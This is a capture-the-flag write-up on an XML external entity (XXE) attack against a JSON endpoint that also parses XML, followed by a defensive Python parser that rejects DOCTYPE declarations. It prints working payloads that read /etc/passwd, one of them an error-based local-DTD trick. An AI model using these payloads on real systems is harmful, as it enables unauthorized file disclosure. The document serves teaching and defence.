A website is presented where you can choose from a list of options. When you change an option, a request is sent to the backend server, which sends back a reply. One of the options is XXE, which tells you that you cannot do XXE on JSON.
Inspecting the source of the website shows that it uses JSON to communicate with the backend, setting Content-Type: application/json and sending a body of the form {"message": "Cola"}.
Instead, the request can be sent with Content-Type: application/xml and a body of <message>Cola</message>.
Knowing this, I tried to do basic XXE by reading a file and just throwing it in instead of Cola, which in hindsight does not make any sense.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<message>&xxe;</message>
This gives you an error saying What are you doing?, or something like that.
Changing &xxe; to e.g. &unknown; produces a parsing error saying that the entity does not exist.
That immediately led me to try getting it to use the value from xxe as a variable name, so that it would give me the content of /etc/passwd as an error message.
Reading a little more, I could see that I could do what I wanted somehow with a local DTD, which would give me an error containing the content of the file.
I then ended up with the following (somewhat).
<!DOCTYPE root [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!-- Redefine a parameter entity that docbookx.dtd itself references.
     Its body is only parsed once the external DTD pulls it in, so the
     %, & and ' characters inside it have to be written as character
     references, otherwise the internal subset is not well-formed. -->
<!ENTITY % ISOamsa '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<root></root>
This gave me the content of the file, and from there on out I needed to find the flag, which was in /root.
I also tried to send a request to my own webserver on my Kali machine, including a remote DTD file, but nothing worked.
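The root cause in this challenge is a backend that happily parses XML, DTD included, when its own client only ever sends JSON. The following is an added example of how such an endpoint can be written defensively; it is not the challenge's code, and the handler names, the error strings and the sample requests are all constructed here. It accepts both encodings the writeup switches between, but rejects any document that carries a DOCTYPE before a single entity is declared, so neither the plain file:// entity nor the local-DTD error trick has anything to work with, and it refuses to follow external entity references as a second line of defence.

```python
import json
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a client-supplied XML document carries a DTD."""


def _parse_xml_message(body: str) -> str:
    """Parse <message>...</message> with the DTD machinery switched off."""
    parser = xml.parsers.expat.ParserCreate()
    state = {"root": None, "text": []}

    def start_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at '<!DOCTYPE', before the internal subset is read, so no
        # entity (general or parameter) is ever declared from client input.
        raise DoctypeForbidden("DOCTYPE declarations are not accepted")

    def start_element(name, attrs):
        if state["root"] is None:
            state["root"] = name

    def char_data(data):
        # expat may deliver text in several chunks; collect and join.
        state["text"].append(data)

    def external_entity(context, base, system_id, public_id):
        # Returning a false value makes expat abort with an ExpatError
        # instead of fetching file:// or http:// content.
        return 0

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.ExternalEntityRefHandler = external_entity
    # Never expand parameter entities, internal or external.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(body, True)

    if state["root"] != "message":
        raise ValueError("root element must be <message>")
    return "".join(state["text"])


def parse_message(content_type: str, body: str) -> str:
    """Dispatch on the media type; both branches return the message string."""
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime == "application/json":
        data = json.loads(body)
        if not isinstance(data, dict) or not isinstance(data.get("message"), str):
            raise ValueError("JSON body must be an object with a string 'message'")
        return data["message"]
    if mime in ("application/xml", "text/xml"):
        return _parse_xml_message(body)
    raise ValueError(f"unsupported Content-Type: {mime}")


def check_request(content_type: str, body: str):
    """Return ("ok", message) or ("rejected", reason) for one request."""
    try:
        return ("ok", parse_message(content_type, body))
    except DoctypeForbidden as exc:
        return ("rejected", str(exc))
    except (ValueError, xml.parsers.expat.ExpatError) as exc:
        return ("rejected", f"malformed request: {exc}")


# Constructed sample requests: the client's normal JSON, the XML variant,
# and the basic file-read payload from the writeup.
JSON_REQUEST = '{"message": "Cola"}'
XML_REQUEST = "<message>Cola</message>"
DTD_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<message>&xxe;</message>"
)

if __name__ == "__main__":
    print(check_request("application/json", JSON_REQUEST))
    print(check_request("application/xml; charset=utf-8", XML_REQUEST))
    print(check_request("application/xml", DTD_PAYLOAD))
```

The point of rejecting on the DOCTYPE handler rather than filtering entity names is that every variant the writeup tries (a general entity, an undefined entity, a parameter entity pulling in a local or remote DTD) needs a DOCTYPE to exist at all. A service whose own client sends only JSON has an even simpler option: do not register an XML content type on the endpoint in the first place.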